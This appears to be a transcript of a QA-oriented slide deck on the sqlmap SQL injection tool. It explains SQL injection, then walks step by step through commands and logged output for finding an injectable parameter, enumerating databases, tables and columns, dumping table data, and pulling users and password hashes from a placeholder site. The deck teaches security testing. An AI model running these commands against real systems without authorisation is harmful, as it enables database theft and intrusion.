SQLMAP Tool Usage - A Heads Up
-
Upload
mindfire-solutions -
Category
Software
-
view
465 -
download
35
description
Transcript of SQLMAP Tool Usage - A Heads Up
![Page 1: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/1.jpg)
SQLMAP SQL INJECTION
AUTOMATION TESTING TOOL
Pinaki mohapatra
QA @Mindfire Solutions
![Page 2: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/2.jpg)
Roadmap
SQL Injection SQLMAP Installation Procedure Case study (A Partical demonstration
using some predefined command that supports SQLMAP tool)
![Page 3: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/3.jpg)
SQL INJECTION
SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).
A attacker or malicious user could provide unexpected inputs to the application that are then used to frame and execute SQL statements on the database.
![Page 4: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/4.jpg)
Cause
The following things might result from SQL injection:
The user could log in to the application as another user, even as an administrator.
The user could view private information belonging to other users e.g. details of other users’ profiles, their transaction details etc.
The user could change application configuration information and the data of the other users.
The user could modify the structure of the database; even delete tables in the application database.
The user could take control of the database server and execute commands on it at will.
![Page 5: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/5.jpg)
SQLMAP
Sqlmap is an open source command-line automatic SQL injection tool developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can then choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS user session and other DB related information like databases, tables, columns, user credentails, there privileges or in simply we can say it expose the entire data that are present in DBMS.
![Page 6: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/6.jpg)
SQLMAP Installation Procedure
Pre-requisites to run sqlmap;
Python 2.7.x and 3.3.x (Recommended by users)
http://www.python.org/download/
Download SQLMAP;
http://sourceforge.net/projects/sqlmapwin/?source=navbar
Reference;
https://github.com/sqlmapproject/sqlmap/wiki/Usage
![Page 7: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/7.jpg)
SQLMAP: Finding !!
Syntax Format:
sqlmap.py -u “<Target url>” (e.g http://www.test.com/index.php/id=5 )
or
sqlmap.py -u “http://www.test.com/index.php/id=5” --dbs
Default behavior;
Test all GET and/or POST Parameters, for all sqlmap options or commands for all databases.
Yes it may take a long time for executing commands.
![Page 8: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/8.jpg)
SQLMAP: Finding !!
Vebosity :
Option: -v: This option can be used to set the verbosity level of output messages. There exist seven levels of verbosity. The default level is 1 in which information, warning, error, critical messages and Python tracebacks (if any occur) are displayed.
0: Show only Python tracebacks, error and critical messages.
1: Show also information and warning messages.
2: Show also debug messages.
3: Show also payloads injected.
4: Show also HTTP requests.
5: Show also HTTP responses' headers.
6: Show also HTTP responses' page content.
![Page 9: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/9.jpg)
SQLMAP: Enumeration (I) Objective
Get/Retrieve data from DBMS tables
What can you get :
--current-db : Extact current application DB in use
--current-user : Expose current DBMS user in use
--users : Expose or list out all the users from DB
--passwords : Lists all DBMS users, password hashes (sqlmap will automatically try to crack the hashes with a dictionary attack)
![Page 10: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/10.jpg)
SQLMAP: Enumeration (I) What can you get :
--privileges : List user privileges
--dbs : Lists all the databases
--tables -D <Database name> : List all the table from a specific database
--columns -T<Table name>-D<Database name> : List all the columns from a specific table under a database
--dump (-D,-T,-C can be used to select what data to dump): Dump data from database/table/column.
![Page 11: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/11.jpg)
CASE STUDYPratical Demonstration
![Page 12: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/12.jpg)
STEP 1Syntax: sqlmap.py -u "<Target URL>"
Objective: This is a simple command which checks the input parameters to find if they are vulnerable to sql injection or not. For this sqlmap sends different kinds of sql injection payloads to the input parameter and checks the output. In the process sqlmap is also able to identify the remote system os, database name and version.
Example: sqlmap.py -u "http://www.test.com/index.php?id=10"
Result:
C:\Users\pinakim\Desktop\sqlmap\sqlmap>sqlmap.py -u"http://www.test.com/web/prod_detail.php?ID=216"
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 11:23:29
[11:23:29] [INFO] using 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\www.test.com\session' as session file
[11:23:29] [INFO] resuming match ratio '0.9' from session file
![Page 13: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/13.jpg)
[11:23:29] [INFO] resuming injection parameter 'ID' from session file
[11:23:29] [INFO] resuming injection type 'numeric' from session file
[11:23:29] [INFO] resuming 0 number of parenthesis from session file
[11:23:29] [INFO] resuming back-end DBMS 'mysql 5' from session file
[11:23:29] [INFO] resuming back-end DBMS operating system 'None' from session fi
le
[11:23:29] [INFO] resuming back-end DBMS operating system 'None' from session fi
le
[11:23:29] [INFO] testing connection to the target url
[11:23:32] [INFO] testing for parenthesis on injectable parameter
[11:23:32] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[*] shutting down at: 11:23:32
![Page 14: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/14.jpg)
STEP 2Syntax: sqlmap.py -u "<Target URL>" --dbs
Objective: It list down the databases if the target URL is vulnerable to sql injection.
Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --dbs
Result:
[11:32:17] [INFO] fetching database names
[11:32:17] [INFO] fetching number of databases
[11:32:17] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\
www.test.com\session': 2
[11:32:17] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\
www.test.com\session': information_schema
[11:32:17] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\
www.test.com\session': testingpa
available databases [2]:
[*] information_schema
[*] testingpa
![Page 15: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/15.jpg)
STEP 3Syntax: sqlmap.py -u "<Target URL>" --tables -D <Database name>
Objective: It find the list of tables that exist for the specified Database.
Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --tables -D TestDB
Result:
web application technology: Apache, PHP 5.4.4
back-end DBMS: MySQL >= 5.0.0
[10:34:37] [INFO] fetching tables for database 'testingpa'
[10:34:37] [INFO] fetching number of tables for database 'testingpa'
[10:34:37] [INFO] retrieved: 36
[10:34:59] [INFO] retrieved: reg_cat
[10:37:33] [INFO] retrieved: reg_section
![Page 16: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/16.jpg)
[10:44:46] [INFO] retrieved: admin_right
[10:47:35] [INFO] retrieved: admin_user
[10:50:20] [INFO] retrieved: new_cat
[10:53:03] [INFO] retrieved: new_image
[10:56:20] [INFO] retrieved: new_section
[11:00:11] [INFO] retrieved: ave_config
[11:02:50] [INFO] retrieved: ave_sections
[11:06:06] [INFO] retrieved: download_new_cat
[11:09:17] [INFO] retrieved: audio_cat
[11:11:37] [INFO] retrieved: audio_image
[11:14:22] [INFO] retrieved: audio_section
.
.
[12:33:11] [INFO] retrieved: vendor_section
Database: testingqa
[36 tables]
![Page 17: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/17.jpg)
+-----------------------+
| reg_cat |
| reg_section |
| admin_group |
| admin_right |
| admin_user |
| new_cat |
| new_image |
| new_section |
| ave_config |
| ave_sections |
| download_new_cat |
| audio_cat |
| audio_image |
| audio_section |
| video_audio_cat |
| video_audio_section |
| linking_config |
| linking_section |
| test_cat |
![Page 18: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/18.jpg)
| test_image |
| test_section |
| test_reg |
| test_videos |
| miscellanesous_test |
| miscellanesous_image |
| miscellanesous_section |
| newsfuse_config |
| newsfuse_section |
| newsfuse_section |
| promo_reg_cat |
| promo_image |
| promo_section |
| promo_test |
| promo_videos |
| test_reg_section |
| vendor_section |
+-----------------------+
[12:36:46] [INFO] Fetched data logged to text files under 'C:\Users\pinakim\Desk top\sqlmap\sqlmap\output\www.test.com'
[*] shutting down at: 12:36:46
![Page 19: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/19.jpg)
STEP 4Syntax: sqlmap.py -u "<Target URL>" --columns -D <Database name> -T <Table
name>
Objective: It find the list of columns that exist for the specified tables under the Database.
Example: sqlmap.py -u "http://www.test.com/index.php?id=10" –columns -D TestDB -T Users
Result:
web application technology: Apache, PHP 5.4.4
back-end DBMS: MySQL 5
[10:46:43] [INFO] fetching columns for table 'req_section' on database 'testingpa'
[10:46:43] [INFO] fetching number of columns for table 'reg_section' on datab
ase 'testingpa'
[10:46:43] [INFO] retrieved: 5
[10:46:56] [INFO] retrieved: reg_id
[10:49:13] [INFO] retrieved: int(11)
![Page 20: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/20.jpg)
[10:50:52] [INFO] retrieved: reg_url
[10:53:06] [INFO] retrieved: varchar(255)
[10:55:53] [INFO] retrieved: reg_redirect
[10:59:07] [INFO] retrieved: varchar(255)
[11:01:42] [INFO] retrieved: reg_active
[11:04:30] [INFO] retrieved: int(11)
[11:06:03] [INFO] retrieved: reg_cat_id
[11:07:27] [INFO] retrieved: int(11)
Database: testingpa
Table: reg_section
[5 columns]
![Page 21: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/21.jpg)
+-----------------+------------------+
| Column | Type |
+-----------------+------------------+
| reg_active | int(11) |
| reg_id | int(11) |
| reg_redirect| varchar(255) |
| reg_url | varchar(255) |
| reg_cat_id | int(11) |
+-----------------+------------------+
[11:09:08] [INFO] Fetched data logged to text files under 'C:\Users\pinakim\Desk
top\sqlmap\sqlmap\output\www.test.com'
[*] shutting down at: 11:09:08
![Page 22: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/22.jpg)
STEP 5Syntax: sqlmap.py -u "<Target URL>" --dump -D <Database Name> -T <Table
Name>
Objective: Now lets comes to the most interesting part, of extracting the data from the table. The below command will retrieve or simply dump the data of the particular table.
Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --dump -D TestDB -T users
Result:
[13:15:46] [INFO] fetching entries for table 'ave_config' on database 'testingpa'
[13:15:46] [INFO] fetching number of entries for table 'ave_config' on database
'testingpa'
[13:15:46] [INFO] retrieved: 1
[13:15:59] [INFO] retrieved: 1
[13:16:34] [INFO] retrieved:
[13:16:49] [INFO] retrieved: [email protected]
![Page 23: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/23.jpg)
[13:22:18] [INFO] retrieved: [email protected]
[13:27:47] [INFO] retrieved: Testing property
[13:32:49] [INFO] retrieved: CMS
Database: testingpa
Table: ave_config
[1 entry]
+-----------+---------------+------------------------+-------------------------+-----------------------+-------------+
|config_id |site_email_cc|site_email_from |site_email_to |site_owner |site_title |
+-----------+---------------+------------------------+-------------------------+-----------------------+-------------+
| 1 | NULL |[email protected] |[email protected] |Testing property | CMS |
+-----------+---------------+------------------------+-------------------------+-----------------------+-------------+
[13:33:51] [INFO] Table 'testingpa.ave_config' dumped to CSV file 'C:\Users\pi
nakim\Desktop\sqlmap\sqlmap\output\www.test.com\dump\testingpa\ave_co
nfig.csv'
[13:33:51] [INFO] Fetched data logged to text files under 'C:\Users\pinakim\Desk
top\sqlmap\sqlmap\output\www.test.com'
[*] shutting down at: 13:33:51
![Page 24: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/24.jpg)
Other Related Command1. To find out more information about the remote system database use the option "-b". It will try to find the exact banner of the database server.
Example: sqlmap.py -u "http://www.test.com/index.php?id=10" -b
Result:
[11:44:40] [INFO] fetching banner
[11:44:40] [INFO] the back-end DBMS operating system is None
banner: '5.1.67-0+test1'
[11:44:40] [INFO] Fetched data logged to text files under 'C:\Users\pinakim\Desk
top\sqlmap\sqlmap\output\www.test.com'
2. The next command will fetch the list of users and passwords.
Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --users --passwords --privileges
Result:
![Page 25: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/25.jpg)
[11:53:23] [INFO] fetching database users
[11:53:23] [INFO] fetching number of database users
[11:53:23] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\
www.test.com\session': 1
[11:53:23] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\
www.test.com\session': 'testingpa'@'%'
database management system users [1]:
[*] 'testingpa'@'%'
[11:53:23] [INFO] fetching database users password hashes
[11:53:23] [INFO] fetching number of password hashes for user 'testingpa'
[11:53:23] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\
www.test.com\session':
[11:53:23] [INFO] read from file 'C:\Users\pinakim\Desktop\sqlmap\sqlmap\output\
www.test.com\session':
[11:53:23] [INFO] retrieved:
[11:53:27] [WARNING] unable to retrieve the number of password hashes for user '
testingpa'
[11:53:27] [ERROR] unable to retrieve the password hashes for the database users
![Page 26: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/26.jpg)
Other Related Command3. For getting the current user & current database information
Example: sqlmap.py -u "http://www.test.com/index.php?id=10" --current-user --is-dba --current-db --thread=10
Result:
[11:57:30] [INFO] fetching current user
[11:57:30] [INFO] retrieving the length of query output
[11:57:30] [INFO] retrieved: 10
[11:59:52] [INFO] retrieved: testingpa@%
current user: 'testingpa@%'
[11:59:52] [INFO] fetching current database
[11:59:52] [INFO] retrieving the length of query output
[11:59:52] [INFO] retrieved: 8
[12:00:58] [INFO] retrieved: testingpa
current database: 'testingpa'
[12:00:58] [INFO] testing if current user is DBA
[12:00:58] [INFO] retrieving the length of query output
![Page 27: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/27.jpg)
Other Related Command[12:00:58] [INFO] retrieved:
[12:01:06] [INFO] retrieved:
current user is DBA: 'False'
[12:01:08] [INFO] Fetched data logged to text files under 'C:\Users\pinakim\Desk
top\sqlmap\sqlmap\output\www.test.com'
4. Run some arbitrary sql command
Example: sqlmap.py -u "http://www.test.com/index.php?id=10" -–sql-query="SELECT * FROM <table name>"
![Page 28: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/28.jpg)
References
https://github.com/sqlmapproject/sqlmap/wiki/Introduction
https://github.com/sqlmapproject/sqlmap
https://github.com/sqlmapproject/sqlmap/wiki/Usage
http://www.youtube.com/watch?v=4PIk26rfmzQ
http://egodox.blogspot.in/2013/04/hack-website-using-sqlmap-sql-injection.html
http://www.binarytides.com/sqlmap-hacking-tutorial/
![Page 29: SQLMAP Tool Usage - A Heads Up](https://reader033.fdocuments.in/reader033/viewer/2022061103/5410304e8d7f727c0c8b460d/html5/thumbnails/29.jpg)
Thank you !!!
www.mindfiresolutions.com